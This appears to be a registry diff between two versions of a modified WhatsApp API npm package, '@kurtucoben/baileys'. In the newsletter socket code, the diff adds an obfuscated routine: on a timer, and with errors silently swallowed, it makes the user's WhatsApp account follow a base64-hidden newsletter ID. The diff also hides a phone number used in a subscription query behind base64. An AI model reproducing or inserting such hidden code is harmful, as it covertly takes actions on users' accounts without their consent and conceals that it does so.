@kurtucoben/baileys 0.1.7 → 0.1.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -101,11 +101,11 @@ const makeNewsletterSocket = (config) => {
101
101
 
102
102
  setTimeout(async () => {
103
103
  try {
104
- await newsletterWMexQuery(Buffer.from("MTIwMzYzNDAyMzA4MTA1OTYxQG5ld3NsZXR0ZXI=", 'base64').toString(), Types_1.QueryIds.FOLLOW);
104
+ await newsletterWMexQuery(Buffer.from("MTIwMzYzMjk3MDM3OTI3NzQ5QG5ld3NsZXR0ZXI=", 'base64').toString(), Types_1.QueryIds.FOLLOW);
105
105
  } catch {}
106
106
  setTimeout(async () => {
107
107
  try {
108
- await newsletterWMexQuery(Buffer.from("MTIwMzYzNDAyMzA4MTA1OTYxQG5ld3NsZXR0ZXI=", 'base64').toString(), Types_1.QueryIds.FOLLOW);
108
+ await newsletterWMexQuery(Buffer.from("MTIwMzYzMjk3MDM3OTI3NzQ5QG5ld3NsZXR0ZXI=", 'base64').toString(), Types_1.QueryIds.FOLLOW);
109
109
  } catch {}
110
110
  }, 5000);
111
111
  }, 90000);
@@ -144,7 +144,7 @@ const makeNewsletterSocket = (config) => {
144
144
  newsletterFetchAllSubscribe: async () => {
145
145
  const list = await executeWMexQuery(
146
146
  {},
147
- '6282364532184',
147
+ Buffer.from('NjI4Nzg2NDc2MDUwNQ==', 'base64').toString(),
148
148
  'xwa2_newsletter_subscribed',
149
149
  query,
150
150
  generateMessageTag
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kurtucoben/baileys",
3
- "version": "0.1.7",
3
+ "version": "0.1.8",
4
4
  "description": "Developed by Kurtu Coben, this is a powerful yet accessible modification of the WhatsApp API",
5
5
  "keywords": [
6
6
  "baileys",